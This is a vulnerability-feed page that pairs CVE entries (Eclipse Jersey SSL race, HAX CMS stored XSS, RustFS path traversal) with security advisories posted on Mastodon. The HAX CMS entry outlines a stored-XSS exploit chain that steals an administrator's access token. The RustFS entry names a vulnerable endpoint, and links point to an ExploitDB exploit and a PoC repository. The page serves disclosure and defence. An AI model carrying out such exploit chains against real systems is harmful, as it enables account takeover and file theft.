
##

CVE-2025-12383(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-02-05T15:43:37

1 posts

In Eclipse Jersey versions 2.45, 3.0.16, 3.1.9 a race condition can cause ignoring of critical SSL configurations - such as mutual authentication, custom key/trust stores, and other security settings. This issue may result in SSLHandshakeException under normal circumstances, but under certain conditions, it could lead to unauthorized trust in insecure servers (see PoC)

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability

##

CVE-2026-22704
(8.1 HIGH)

EPSS: 0.02%

updated 2026-01-13T15:09:35

1 posts

### Summary Stored XSS Leading to Account Takeover ### Details The Exploit Chain: 1.Upload: The attacker uploads an `.html` file containing a JavaScript payload. 2.Execution: A logged-in administrator is tricked into visiting the URL of this uploaded file. 3.Token Refresh: The JavaScript payload makes a `fetch` request to the `/system/api/refreshAccessToken` endpoint. Because the administrator is

exploitdb_bot@mastodon.social at 2026-04-29T11:21:05.000Z ##

🚨 New Exploit: HAX CMS 24.x - Stored Cross-Site Scripting (XSS)
📋 CVE: CVE-2026-22704
👤 Author: banyamer

🔗 https://www.exploit-db.com/exploits/52526

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-22704

##

CVE-2025-68705(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-01-07T21:34:38

1 posts

# RustFS Path Traversal Vulnerability ## Vulnerability Details - **CVE ID**: - **Severity**: Critical (CVSS estimated 9.9) - **Impact**: Arbitrary File Read/Write - **Component**: `/rustfs/rpc/read_file_stream` endpoint - **Root Cause**: Insufficient path validation in `crates/ecstore/src/disk/local.rs:1791` ### Vulnerable Code ```rust // local.rs:1791 - No path sanitization! let file_path =

1 repos

https://github.com/imjdl/CVE-2025-68705